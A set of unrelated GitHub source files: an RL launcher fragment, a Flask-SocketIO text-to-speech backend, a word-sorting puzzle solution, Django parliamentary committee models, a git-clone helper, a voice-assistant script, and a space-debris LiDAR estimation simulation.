max_path_length=%d...'%(\n algo_name, n_itr, max_path_length))\n\n if algo_name in ['ddpg']:\n algo = DDPG(\n env=env,\n policy=policy,\n es=es,\n qf=qf,\n batch_size=qf_batch_size,\n max_path_length=max_path_length,\n epoch_length=batch_size, # make comparable to batchopt methods\n min_pool_size=min_pool_size,\n replay_pool_size=replay_pool_size,\n n_epochs=n_itr,\n discount=discount,\n scale_reward=scale_reward,\n qf_learning_rate=qf_learning_rate,\n policy_learning_rate=learning_rate,\n replacement_prob=replacement_prob,\n policy_updates_ratio=policy_updates_ratio,\n # Uncomment both lines (this and the plot parameter below) to enable plotting\n # plot=True,\n )\n elif algo_name in ['trpo', 'qprop']:\n if qf is not None:\n qf_baseline = QfunctionBaseline(env_spec=env.spec,\n policy=policy, qf=qf)\n algo = TRPO(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n max_path_length=max_path_length,\n n_itr=n_itr,\n discount=discount,\n step_size=step_size,\n gae_lambda=gae_lambda,\n # Uncomment both lines (this and the plot parameter below) to enable plotting\n # plot=True,\n sample_backups=sample_backups,\n qf=qf,\n qf_batch_size=qf_batch_size,\n min_pool_size=min_pool_size,\n scale_reward=scale_reward,\n qprop_min_itr=qprop_min_itr,\n qf_updates_ratio=qf_updates_ratio,\n qprop_eta_option=qprop_eta_option,\n replay_pool_size=replay_pool_size,\n replacement_prob=replacement_prob,\n qf_baseline=qf_baseline,\n qf_learning_rate=qf_learning_rate,\n qprop_use_qf_baseline=qprop_use_qf_baseline,\n )\n elif algo_name in ['vpg', 'qvpg']:\n if qf is not None:\n qf_baseline = QfunctionBaseline(env_spec=env.spec,\n policy=policy, qf=qf)\n algo = VPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n max_path_length=max_path_length,\n n_itr=n_itr,\n discount=discount,\n gae_lambda=gae_lambda,\n optimizer_args=dict(\n tf_optimizer_args=dict(\n learning_rate=learning_rate,\n )\n ),\n qf=qf,\n qf_batch_size=qf_batch_size,\n min_pool_size=min_pool_size,\n scale_reward=scale_reward,\n qprop_min_itr=qprop_min_itr,\n qf_updates_ratio=qf_updates_ratio,\n qprop_eta_option=qprop_eta_option,\n replay_pool_size=replay_pool_size,\n qf_baseline=qf_baseline,\n qf_learning_rate=qf_learning_rate,\n qprop_use_qf_baseline=qprop_use_qf_baseline,\n )\n return algo\n\nstub(globals())\n","repo_name":"StevenLOL/rllabplusplus","sub_path":"sandbox/rocky/tf/launchers/launcher_stub_utils.py","file_name":"launcher_stub_utils.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"72821442656","text":"async_mode = None\n\nif async_mode is None:\n try:\n import eventlet\n async_mode = 'eventlet'\n except ImportError:\n pass\n\n if async_mode is None:\n try:\n from gevent import monkey\n async_mode = 'gevent'\n except ImportError:\n pass\n\n if async_mode is None:\n async_mode = 'threading'\n\n print('async_mode is ' + async_mode)\n\nif async_mode == 'eventlet':\n import eventlet\n eventlet.monkey_patch()\nelif async_mode == 'gevent':\n from gevent import monkey\n monkey.patch_all()\n\nfrom threading import Thread\nfrom flask import Flask, json\nfrom flask import request, Response\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit\nfrom dbconn import db_conn, db_aggregation\nfrom inference import Inference\nfrom backend_helpers import helper, log\nfrom backend_helpers.s3_storage import S3Storage\n\nimport time\n\n\n\nCHUNK = 4096\nPORT = 8888\nS3BUCKET = \"https://audiomodelstts.s3.eu-central-1.amazonaws.com/\"\n\ninference = Inference()\ninference.load_model()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'development key'\nsocketio = SocketIO(app, async_mode=async_mode)\ncors = CORS(app, resources={r\"/\": {\"origins\": \"\"}})\nCORS(app)\n\nthread = None\nconn = None\ncursor = None\n\nlogger = log.setup_custom_logger('root')\n\n\nclass AggData(object):\n def __init__(self, filename, audio_length, job_text_id):\n self.filename = filename\n self.audio_length = audio_length\n self.job_text_id = job_text_id\n self.audio_length_percent = 0\n\n\n@socketio.on('send_message')\ndef getdata(send_message):\n start = time.time()\n try:\n tmp_val = json.loads(send_message['body'])\n data = tmp_val['message']\n user = tmp_val['user']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return \"\"\n\n record = db_conn.perform_query(user)\n\n if record == None:\n return None\n\n s3_client = S3Storage()\n\n headline = (data[:70] + '..') if len(data) > 70 else data\n job_id = db_conn.perform_insert_jobs(record['uid'], 0, 1, headline)\n\n count = 0\n sentence_list = helper.split_sentences(data)\n agg_list = []\n\n for sentence in sentence_list:\n job_text_id = job_id + '_' + str(count)\n audio_length = inference.infer(sentence, job_text_id)\n filename = \"tmp/\" + job_text_id + \".mp3\"\n agg_list.append(AggData(filename, audio_length, job_text_id))\n\n s3_filename = job_text_id + \".mp3\"\n db_conn.perform_insert_job_text(job_id, sentence, audio_length, count)\n count += 1\n\n response = s3_client.store_data(\"audiomodelstts\", filename, s3_filename)\n print(sentence)\n data = {\n 'id': str(time.time()),\n 'downloadURL': S3BUCKET+s3_filename,\n 'sentence': sentence,\n 'duration': str(audio_length),\n 'audio_id': count,\n 'job_id': S3BUCKET+s3_filename\n }\n\n emit('player', {'data': data}, broadcast=False, include_self=True)\n\n\n #start background thread - merge files - write to db - propagate changes to frontend\n audio_length_total = db_aggregation.aggregate_job_results(agg_list, job_id, s3_client)\n data = {\n 'user': user,\n 'uid': record['uid']\n }\n\n status = gettable(data)\n end = time.time()\n print(\"Produced audio length: \" + str(audio_length_total) + \" Processing time: \" + str(end - start))\n\n\n@socketio.on('get_table')\ndef gettable(get_table=None):\n db_results = []\n user = \"\"\n uid = \"\"\n record = None\n tmp_val = None\n try:\n user = get_table['user']\n uid = get_table['uid']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return False\n\n try:\n if uid == \"\":\n record = db_conn.perform_query(user)\n db_results = db_conn.perform_query_jobs(record['uid'])\n else:\n db_results = db_conn.perform_query_jobs(uid)\n except Exception as e:\n logger.error(\"No result for table\", e)\n return False\n\n emit('table', {'data': db_results}, broadcast=False, include_self=True)\n return True\n\n\n@socketio.on('delete_table')\ndef delete_entry(delete_table=None):\n\n uid = \"\"\n\n try:\n uid = delete_table['uid']\n except Exception as e:\n logger.error(\"Wrong input - return null\", e)\n return \"\"\n\n try:\n record = db_conn.perform_delete_jobs(uid)\n except Exception as e:\n logger.error(\"No result for table\", e)\n return \"\"\n\n #emit('table', {'data': db_results}, broadcast=False, include_self=True)\n\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n count = 0\n while True:\n time.sleep(10)\n count += 1\n socketio.emit('my response',\n {'data': 'Server generated event', 'count': count},\n namespace='/test')\n\n\n@socketio.on('connect')\ndef connected():\n print(\"connecting\")\n print(request.sid)\n data = {'request_id': request.sid,\n 'timestamp': int(time.time())}\n json_data = json.dumps(data)\n emit('echo', {'data': json_data}, broadcast=False, include_self=True)\n\n\n@socketio.on('disconnect')\ndef disconnect():\n print(\"disconnecting\")\n data = {'request_id': request.sid,\n 'timestamp': int(time.time())}\n json_data = json.dumps(data)\n emit('echo', {'data': json_data}, broadcast=False, include_self=True)\n\n\n@app.route('/')\ndef index():\n Response.headers.add('Access-Control-Allow-Origin', '*')\n global thread\n if thread is None:\n thread = Thread(target=background_thread)\n thread.daemon = True\n thread.start()\n return \"\"\n\n\nif __name__ == \"__main__\":\n from gevent import monkey\n monkey.patch_all()\n socketio.run(app, debug=True, port=8888, host=\"0.0.0.0\")\n","repo_name":"jaystary/tacotron2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"83067992","text":"'''\n******* 문제 푼 후 느낀 것 *********\n'''\n\n'''\n2022/10/07\nboj.kr/20920\n영단어 암기는 괴로워\n'''\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int,input().split())\n\n# (횟수, 길이, 첫문자)\nword_dict = dict()\n\nfor _ in range(N):\n word = input().strip()\n word_len = len(word)\n \n if word_len < M :\n continue\n\n if word not in word_dict:\n word_dict[word] = (-1, -word_len, word) \n else :\n a, b, c = word_dict[word]\n word_dict[word] = (a-1, b, c)\n\nfor key in sorted(word_dict.items(), key=lambda x: (x[1][0], x[1][1], x[1][2])):\n print(key[0])","repo_name":"P3RP/daily-algorithm-test","sub_path":"kty/baekjoon/20920.py","file_name":"20920.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"73750245856","text":"# encoding: utf-8\nimport re\nimport logging\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.text import truncate_words\nfrom django.contrib.contenttypes import generic\n\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.contenttypes.models import ContentType\nfrom tagging.models import Tag\nfrom annotatetext.models import Annotation\nfrom knesset.events.models import Event\n\nCOMMITTEE_PROTOCOL_PAGINATE_BY = 400\n\nlogger = logging.getLogger(\"open-knesset.committees.models\")\n\nclass Committee(models.Model):\n name = models.CharField(max_length=256)\n members = models.ManyToManyField('mks.Member', related_name='committees')\n chairpersons = models.ManyToManyField('mks.Member', related_name='chaired_committees')\n replacements = models.ManyToManyField('mks.Member', related_name='replacing_in_committees')\n events = generic.GenericRelation(Event, content_type_field=\"which_type\",\n object_id_field=\"which_pk\")\n\n def __unicode__(self):\n return \"%s\" % self.name\n\n @models.permalink\n def get_absolute_url(self):\n return ('committee-detail', [str(self.id)])\n\n @property\n def annotations(self):\n protocol_part_tn = ProtocolPart._meta.db_table\n meeting_tn = CommitteeMeeting._meta.db_table\n committee_tn = Committee._meta.db_table\n annotation_tn = Annotation._meta.db_table\n protocol_part_ct = ContentType.objects.get_for_model(ProtocolPart)\n ret = Annotation.objects.filter(content_type=protocol_part_ct)\n return ret.extra(tables = [protocol_part_tn,\n meeting_tn, committee_tn],\n where = [ \"%s.object_id=%s.id\" % (annotation_tn, protocol_part_tn),\n \"%s.meeting_id=%s.id\" % (protocol_part_tn, meeting_tn),\n \"%s.committee_id=%%s\" % meeting_tn],\n params = [ self.id ]).distinct()\n\n def members_by_presence(self):\n members = []\n for m in (self.members.all()|\n self.chairpersons.all()|\n self.replacements.all()).distinct():\n m.meetings_count = \\\n 100 * m.committee_meetings.filter(committee=self).count() \\\n / self.meetings.count()\n members.append(m)\n members.sort(key=lambda x:x.meetings_count, reverse=True)\n return members\n\n def recent_meetings(self):\n return self.meetings.all().order_by('-date')[:10]\n\nnot_header = re.compile(r'(^אני )|((אלה|אלו|יבוא|מאלה|ייאמר|אומר|אומרת|נאמר|כך|הבאים|הבאות):$)|(\\(.\\))|(\\(\\d+\\))|(\\d\\.)'.decode('utf8'))\ndef legitimate_header(line):\n \"\"\"Retunrs true if 'line' looks like something should should be a protocol part header\"\"\"\n if not(line.endswith(':')) or len(line)>50 or not_header.search(line):\n return False\n return True\n\nclass CommitteeMeeting(models.Model):\n committee = models.ForeignKey(Committee, related_name='meetings')\n # TODO: do we really need a date string? can't we just format date?\n date_string = models.CharField(max_length=256)\n date = models.DateField()\n mks_attended = models.ManyToManyField('mks.Member', related_name='committee_meetings')\n votes_mentioned = models.ManyToManyField('laws.Vote', related_name='committee_meetings', blank=True)\n protocol_text = models.TextField(null=True,blank=True)\n topics = models.TextField(null=True,blank=True)\n src_url = models.URLField(verify_exists=False, max_length=1024,null=True,blank=True)\n\n class Meta:\n ordering = ('-date',)\n verbose_name = _('Committee Meeting')\n verbose_name_plural = _('Committee Meetings')\n\n def title (self):\n return truncate_words (self.topics, 12)\n\n def __unicode__(self):\n return (u\"%s - %s\" % (self.committee.name,\n self.title())).replace(\" \", u\"\\u00A0\")\n\n @models.permalink\n def get_absolute_url(self):\n return ('committee-meeting', [str(self.id)])\n\n def _get_tags(self):\n tags = Tag.objects.get_for_object(self)\n return tags\n\n def _set_tags(self, tag_list):\n Tag.objects.update_tags(self, tag_list)\n\n tags = property(_get_tags, _set_tags)\n\n def save(self, **kwargs):\n super(CommitteeMeeting, self).save(**kwargs)\n\n def create_protocol_parts(self, delete_existing=False):\n \"\"\" Create protocol parts from this instance's protocol_text\n Optionally, delete existing parts.\n If the meeting already has parts, and you don't ask to\n delete them, a ValidationError will be thrown, because\n it doesn't make sense to create the parts again.\n \"\"\"\n if delete_existing:\n ppct = ContentType.objects.get_for_model(ProtocolPart)\n annotations = Annotation.objects.filter(content_type=ppct, object_id__in=self.parts.all)\n logger.debug('deleting %d annotations, because I was asked to delete the relevant protocol parts on cm.id=%d' % (annotations.count(), self.id))\n annotations.delete()\n self.parts.all().delete()\n else:\n if self.parts.count():\n raise ValidationError('CommitteeMeeting already has parts. delete them if you want to run create_protocol_parts again.')\n\n if not self.protocol_text: # sometimes there are empty protocols\n return # then we don't need to do anything here.\n\n # break the protocol to its parts\n # first, fix places where the colon is in the begining of next line\n # (move it to the end of the correct line)\n protocol_text = []\n for line in re.sub(\"[ ]+\",\" \", self.protocol_text).split('\\n'):\n if line.startswith(':'):\n protocol_text[-1] += ':'\n protocol_text.append(line[1:])\n else:\n protocol_text.append(line)\n\n i = 1\n section = []\n header = ''\n\n # now create the sections\n for line in protocol_text:\n if legitimate_header(line):\n if section:\n ProtocolPart(meeting=self, order=i,\n header=header, body='\\n'.join(section)).save()\n i += 1\n header = line[:-1]\n section = []\n else:\n section.append (line)\n\n # don't forget the last section\n ProtocolPart(meeting=self, order=i,\n header=header, body='\\n'.join(section)).save()\n\nclass ProtocolPartManager(models.Manager):\n def list(self):\n return self.order_by(\"order\")\n\nclass ProtocolPart(models.Model):\n meeting = models.ForeignKey(CommitteeMeeting, related_name='parts')\n order = models.IntegerField()\n header = models.TextField(blank=True)\n body = models.TextField(blank=True)\n speaker = models.ForeignKey('persons.Person', blank=True, null=True, related_name='protocol_parts')\n objects = ProtocolPartManager()\n\n annotatable = True\n\n def get_absolute_url(self):\n if self.order == 1:\n return self.meeting.get_absolute_url()\n else:\n page_num = 1 + (self.order-1)/COMMITTEE_PROTOCOL_PAGINATE_BY\n if page_num==1: # this is on first page\n return \"%s#speech-%d-%d\" % (self.meeting.get_absolute_url(),\n self.meeting.id, self.order)\n else:\n return \"%s?page=%d#speech-%d-%d\" % (self.meeting.get_absolute_url(),\n page_num,\n self.meeting.id, self.order)\n\n def __unicode__(self):\n return \"%s %s: %s\" % (self.meeting.committee.name, self.header,\n self.header)\n\n\nfrom listeners import *\n","repo_name":"daonb/django-committee","sub_path":"src/committee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25475064707","text":"from common import *\nfrom joblib import Parallel, delayed\nimport yaml, os, pathlib\n\ndef success(path, name, out):\n for l in out: filter_output(l)\n print(\"Done cloning repo {} into {}\".format(name, path))\n\ndef failure(path):\n print(colored(\"Failed to clone {}\".format(path), 'red'))\n\ndef git_clone(name, path):\n print(\"Cloning {} into {}\".format(name, path))\n out, err, ret = git(['clone', name, path], path)\n\n if ret == 0:\n success(path, name, out)\n else:\n failure(path)\n\ndef create_symlinks(links):\n for s,link in links.items():\n src = str(pathlib.Path(s).resolve())\n\n if os.path.exists(link): # Link already exists\n continue\n elif not os.path.exists(src): # Targer doesn't exist\n print('Skipping link {} to {} as {} doesnt exists'.format(link, src, src))\n continue\n\n pathlib.Path(link).parent.mkdir(parents=True, exist_ok=True)\n print('Creating symlink {} to {}'.format(link, src))\n os.symlink(src, link)\n\ndef recursive_walk(d, depth=0, parent=[]):\n for k, v in sorted(d.items(), key=lambda x: x[0]):\n if isinstance(v, dict):\n recursive_walk(v, depth+1, parent + [k])\n continue\n\n path = \"/\".join(parent + [k])\n if os.path.exists(path):\n continue\n\n if v.startswith('git@') or v.startswith('https://'):\n git_repos[v] = path\n else:\n sym_links[v] = path\n\ndef main():\n with open('_repos.yml', 'r') as f:\n repos = yaml.load(f)\n\n recursive_walk(repos)\n Parallel(n_jobs=get_cpu_count())(delayed(git_clone)(r,p) for r,p in git_repos.items())\n create_symlinks(sym_links)\n\ngit_repos = {}\nsym_links = {}\nmain()\n","repo_name":"dnktty/batch-git-clone","sub_path":"clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28042158522","text":"#you can change ALEXA to any name you want, all you have to do is change 'alexa' to your desired name \r\n#since always typing speech_recognition takes a lot of time we use [as sr] you can change sr to anything you wish\r\nimport speech_recognition as sr\r\n#pyttsx3 is a library in python that is used to convert text to speech\r\nimport pyttsx3\r\n#pywhatkit is a library in python that is used to many authomation mainly whatsapp and youtube, in the below code we use the youtube feature \r\nimport pywhatkit\r\nimport datetime\r\n#wikipedia ia a library we use to search information, this has a package to guve summary \r\nimport wikipedia\r\nimport pyjokes\r\n\r\nlistener = sr.Recognizer()\r\nengine = pyttsx3.init()\r\n#there are two options for the voice, 0 for male and 1 for female\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id)\r\n\r\ndef talk(text):\r\n engine.say(text)\r\n engine.runAndWait()\r\n \r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source:\r\n print(\"listening....\")\r\n voice = listener.listen(source)\r\n command = listener.recognize_google(voice)\r\n command = command.lower()\r\n if 'alexa' in command:\r\n command = command.replace('alexa','')\r\n # engine.say(command)\r\n # engine.runAndWait()\r\n # print(command)\r\n \r\n #you need except here because sometimes your microphone might not work or your voice is not recognised , if you want to relate this is like try and catch block in java \r\n except:\r\n pass\r\n return command\r\n\r\ndef run_alexa():\r\n command = take_command()\r\n print(command)\r\n if 'play' in command:\r\n song = command.replace('play', '')\r\n talk('playing' + song)\r\n pywhatkit.playonyt(song)\r\n \r\n elif 'time' in command:\r\n time = datetime.datetime.now().strftime('%I %M %p')\r\n print(time)\r\n talk('Current time is'+ time)\r\n \r\n elif 'who is' in command:\r\n person = command.replace('who is','')\r\n info = wikipedia.summary(person, 2)\r\n # print(info)\r\n talk(info)\r\n \r\n elif 'date' in command:\r\n talk(\"sorry, I don't date losers \")\r\n \r\n elif 'i love you' in command: \r\n talk(\"that is very cute but you are ugly\") \r\n \r\n elif 'are you single' in command: \r\n talk(\"Bro I'm dating your wifi... oops\") \r\n \r\n elif 'joke' in command:\r\n funny = pyjokes.get_joke()\r\n print(funny)\r\n talk(funny)\r\n #talk(pyjokes.get_joke())\r\n else:\r\n talk(\"I don't understand\")\r\n \r\n \r\nwhile True: \r\n run_alexa()\r\n","repo_name":"KeerthanaMSwamy/Alexa-clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"2326092086","text":"import dynamics\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport lidarScan2\nimport boundingbox\nfrom stl import mesh\nfrom estimateOmega import estimate\nfrom associationdata import nearest_search\n\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import pyplot\n\ndef drawrectangle(ax, p1, p2, p3, p4, p5, p6, p7, p8, color):\n # z1 plane boundary\n ax.plot([p1[0], p2[0]], [p1[1], p2[1]], [p1[2], p2[2]], color=color) # W\n ax.plot([p2[0], p3[0]], [p2[1], p3[1]], [p2[2], p3[2]], color=color)\n ax.plot([p3[0], p4[0]], [p3[1], p4[1]], [p3[2], p4[2]], color=color)\n ax.plot([p4[0], p1[0]], [p4[1], p1[1]], [p4[2], p1[2]], color=color)\n\n # z1 plane boundary\n ax.plot([p5[0], p6[0]], [p5[1], p6[1]], [p5[2], p6[2]], color=color) # W\n ax.plot([p6[0], p7[0]], [p6[1], p7[1]], [p6[2], p7[2]], color=color)\n ax.plot([p7[0], p8[0]], [p7[1], p8[1]], [p7[2], p8[2]], color=color)\n ax.plot([p8[0], p5[0]], [p8[1], p5[1]], [p8[2], p5[2]], color=color)\n\n # Connecting\n ax.plot([p1[0], p5[0]], [p1[1], p5[1]], [p1[2], p5[2]], color=color) # W\n ax.plot([p2[0], p6[0]], [p2[1], p6[1]], [p2[2], p6[2]], color=color)\n ax.plot([p3[0], p7[0]], [p3[1], p7[1]], [p3[2], p7[2]], color=color)\n ax.plot([p4[0], p8[0]], [p4[1], p8[1]], [p4[2], p8[2]], color=color)\n\n ax.scatter(p1[0], p1[1], p1[2], color='b')\n ax.scatter(p2[0], p2[1], p2[2], color='g')\n ax.scatter(p3[0], p3[1], p3[2], color='r')\n ax.scatter(p4[0], p4[1], p4[2], color='c')\n ax.scatter(p5[0], p5[1], p5[2], color='m')\n ax.scatter(p6[0], p6[1], p6[2], color='y')\n ax.scatter(p7[0], p7[1], p7[2], color='k')\n ax.scatter(p8[0], p8[1], p8[2], color='b')\n\n# some utility functions\ndef tilde(v):\n vx = v[0,0]\n vy = v[1,0]\n vz = v[2,0]\n v_tilde = np.array([[0,-vz,vy],[vz,0,-vx],[-vy,vx,0]])\n return v_tilde\n\ndef skew(vector):\n vector = list(vector)\n return np.array([[0, -vector[2], vector[1]],\n [vector[2], 0, -vector[0]],\n [-vector[1], vector[0], 0]])\n\ndef getR(x,y,z):\n # we want to find the rotation matrix that takes [x,y,z] to [0,0,1]\n p = np.array([x,y,z]) # position vector, but also z-axis of b frame\n z_L = np.array([0,0,1]) # z-axis of L frame\n z_B = p/np.linalg.norm(p)\n e = (np.cross(z_L, z_B))[:,np.newaxis] # 3x1 axis of rotation\n phi = np.arccos(np.dot(z_B, z_L)) # z_B and z_L are already unit vectors\n R = e@(e.T) + (np.identity(3)-(e@e.T))*np.cos(phi) + tilde(e)*np.sin(phi)\n return R.T\n\n\ndef F_matrix(dt, R, p_k, p1_k, p2_k, p3_k, p4_k, p5_k, p6_k, p7_k, p8_k):\n \"\"\"\n\n :param dt:\n :param R:\n :param p_k:\n :param p1_k:\n :param p2_k:\n :param p3_k:\n :param p4_k:\n :param p5_k:\n :param p6_k:\n :param p7_k:\n :param p8_k:\n :return:\n \"\"\"\n F = np.eye(33)\n\n # p_k - dv/dp_k\n F[0, 3] = dt\n F[1, 4] = dt\n F[2, 5] = dt\n\n # p1_k - dv/dp1_k\n F[9, 3] = dt\n F[10, 4] = dt\n F[11, 5] = dt\n\n # dp1_k/dp1_k\n F[9:12, 9:12] = R\n\n # dp1_k/dp_k\n F[9:12, 0:3] = 1 - R\n\n # dp1_k/domega\n F[9:12, 6:9] = skew(p1_k - p_k)\n\n # p2_k\n F[12, 3] = dt\n F[13, 4] = dt\n F[14, 5] = dt\n F[12:15, 12:15] = R\n F[12:15, 0:3] = 1 - R\n F[12:15, 6:9] = skew(p2_k - p_k)\n\n # p3_k\n F[15, 3] = dt\n F[16, 4] = dt\n F[17, 5] = dt\n F[15:18, 15:18] = R\n F[15:18, 0:3] = 1 - R\n F[15:18, 6:9] = skew(p3_k - p_k)\n\n # p4_k\n F[18, 3] = dt\n F[19, 4] = dt\n F[20, 5] = dt\n F[18:21, 18:21] = R\n F[18:21, 0:3] = 1 - R\n F[18:21, 6:9] = skew(p4_k - p_k)\n\n # p5_k\n F[21, 3] = dt\n F[22, 4] = dt\n F[23, 5] = dt\n F[21:24, 21:24] = R\n F[21:24, 0:3] = 1 - R\n F[21:24, 6:9] = skew(p5_k - p_k)\n\n # p6_k\n F[24, 3] = dt\n F[25, 4] = dt\n F[26, 5] = dt\n F[24:27, 24:27] = R\n F[24:27, 0:3] = 1 - R\n F[24:27, 6:9] = skew(p6_k - p_k)\n\n # p7_k\n F[27, 3] = dt\n F[28, 4] = dt\n F[29, 5] = dt\n F[27:30, 27:30] = R\n F[27:30, 0:3] = 1 - R\n F[27:30, 6:9] = skew(p7_k - p_k)\n\n # p8_k\n F[30, 3] = dt\n F[31, 4] = dt\n F[32, 5] = dt\n F[30:33, 30:33] = R\n F[30:33, 0:3] = 1 - R\n F[30:33, 6:9] = skew(p8_k - p_k)\n\n return F\n\ndef verticeupdate(dt, x_k):\n\n # Decompose the state vector\n p_k = x_k[:3]\n v_k = x_k[3:6]\n omega_k = x_k[6:9]\n p1_k = x_k[9:12]\n p2_k = x_k[12:15]\n p3_k = x_k[15:18]\n p4_k = x_k[18:21]\n p5_k = x_k[21:24]\n p6_k = x_k[24:27]\n p7_k = x_k[27:30]\n p8_k = x_k[30:33]\n\n # Rotation matrix - rodrigues formula\n e_omega = omega_k / np.linalg.norm(omega_k) # Unit vector along omega\n phi = np.linalg.norm(omega_k) * dt\n ee_t = np.matmul(e_omega.reshape(len(e_omega), 1), e_omega.reshape(1, len(e_omega)))\n e_tilde = skew(e_omega)\n R_k_kp1 = ee_t + (np.eye(len(e_omega)) - ee_t) * np.cos(phi) + e_tilde * np.sin(phi)\n\n # Translate vertices to origin\n p1_ko = p1_k - p_k\n p2_ko = p2_k - p_k\n p3_ko = p3_k - p_k\n p4_ko = p4_k - p_k\n p5_ko = p5_k - p_k\n p6_ko = p6_k - p_k\n p7_ko = p7_k - p_k\n p8_ko = p8_k - p_k\n\n # Rotate vertices\n p1_kp1o = np.matmul(R_k_kp1.T, p1_ko.reshape(len(p1_ko), 1))\n p2_kp1o = np.matmul(R_k_kp1.T, p2_ko.reshape(len(p2_ko), 1))\n p3_kp1o = np.matmul(R_k_kp1.T, p3_ko.reshape(len(p3_ko), 1))\n p4_kp1o = np.matmul(R_k_kp1.T, p4_ko.reshape(len(p4_ko), 1))\n p5_kp1o = np.matmul(R_k_kp1.T, p5_ko.reshape(len(p5_ko), 1))\n p6_kp1o = np.matmul(R_k_kp1.T, p6_ko.reshape(len(p6_ko), 1))\n p7_kp1o = np.matmul(R_k_kp1.T, p7_ko.reshape(len(p7_ko), 1))\n p8_kp1o = np.matmul(R_k_kp1.T, p8_ko.reshape(len(p8_ko), 1))\n\n # Translate them back\n p1_kp1 = (p1_kp1o.T + p_k + v_k * dt).ravel()\n p2_kp1 = (p2_kp1o.T + p_k + v_k * dt).ravel()\n p3_kp1 = (p3_kp1o.T + p_k + v_k * dt).ravel()\n p4_kp1 = (p4_kp1o.T + p_k + v_k * dt).ravel()\n p5_kp1 = (p5_kp1o.T + p_k + v_k * dt).ravel()\n p6_kp1 = (p6_kp1o.T + p_k + v_k * dt).ravel()\n p7_kp1 = (p7_kp1o.T + p_k + v_k * dt).ravel()\n p8_kp1 = (p8_kp1o.T + p_k + v_k * dt).ravel()\n\n return p1_kp1, p2_kp1, p3_kp1, p4_kp1, p5_kp1, p6_kp1, p7_kp1, p8_kp1, R_k_kp1\n\n# initialize debris position, velocity and orientation\nO_B = np.array([0,0,0])\nO_L = np.array([0,0,0])\n# Dynamics initializations\nr0 = [0, -0.0040, 0] # initial starting position of chaser (km)\nrdot0 = [-0.0001, 0.0, 0.0001] # initial velocity of debris relative to chaser(km/s)\nR = 500 + 6378 # Altitude of orbit (km)\nmu = 398600.5 # Gravitational constant\nomeg = math.sqrt(mu / R ** 3) # n in the derivations\nRot_0 = np.identity(3) # initial starting rotation matrix/orientation\nomega_L = np.array([1.,1.,1.]) # inertial, unchanging angular velocity of debris\nomega_L_axis = omega_L/np.linalg.norm(omega_L)\n\n# specify time frame and time step\nnframes = 3\ndt = 0.01\n\n# simulate debris velocity (linear and angular) in {L} frame from dynamics\nx, y, z, vx, vy, vz, d, v = dynamics.propagate(dt, nframes, r0, rdot0, omeg)\ndebris_pos = np.vstack([x,y,z]).T\ndebris_vel = np.vstack([vx,vy,vz]).T\n\n# specify Lidar resolution and range\n# LiDAR point cloud generation initializations\nh_resolution = 40 # Number of rays horizontally\nv_resolution = 40 # Number of rays vertically\nh_range = 120 # Vertical lidar angle range in degrees\nv_range = 60 # Horizontal lidar angle range in degrees\n\n\n# generate debris mesh (we only want to do this once to improve compute efficiency)\ndebris_file = 'kompsat-1-v9.stl'\ndebris = mesh.Mesh.from_file(debris_file) # Grab satellite mesh\n\n# Simulation Loop\nXBs = []\nYBs = []\nZBs = []\nPBs = []\nVBs = []\nRot_L_to_B = []\nfor i in range(nframes):\n # solve for rotation matrix B^R_L (R*L => B)\n Rot_L_to_B.append(getR(x[i],y[i],z[i]))\n # express the position and velocity in B\n debris_pos_B = Rot_L_to_B[i]@debris_pos[i]\n debris_vel_B = Rot_L_to_B[i]@debris_vel[i]\n\n # orient debris mesh in {B}\n if i==0: # move the debris to its initial location\n Rot_to_B = Rot_L_to_B[i]@Rot_0\n debris.rotate_using_matrix(Rot_to_B.T) # transpose because numpy stl rotation matrix is done backwards\n else:\n # rotation stacks upon previous rotations\n debris.rotate(Rot_L_to_B[i]@omega_L_axis,-np.linalg.norm(omega_L*dt))\n trans_to_B = debris_pos_B\n debris.translate(trans_to_B)\n # do lidarScan in {B}\n \n omega_B = Rot_L_to_B[i]@omega_L\n X, Y, Z, V_los = lidarScan2.point_cloud(O_B, h_resolution, v_resolution, h_range, v_range, debris, debris_pos_B, debris_vel_B, omega_B) # Generate distances\n # obtain points and LOS velocities in {B}\n XBs.append(X)\n YBs.append(Y)\n ZBs.append(Z)\n PBs.append(np.vstack([X,Y,Z]).T)\n VBs.append(V_los)\n # remember, LOS velocities do not care about rotation speed\n \n # undo the translation since we have debris positions in {L}\n if i+1 < nframes:\n debris.translate(-trans_to_B)\n pass\n\n# Estimation Loop\nXLs = []\nYLs = []\nZLs = []\nPLs = []\nVLs = VBs\n\n\n# Running the simulation\n# Initializations in L Frameeeee\nL_0 = 2 # Initial Length of box - x\nD_0 = 2 # Initial Width of box - y\nH_0 = 2 # Initial Height of box - z\np_0 = np.array(debris_pos[0]) # Guess of initial position of debris - *need to formulate 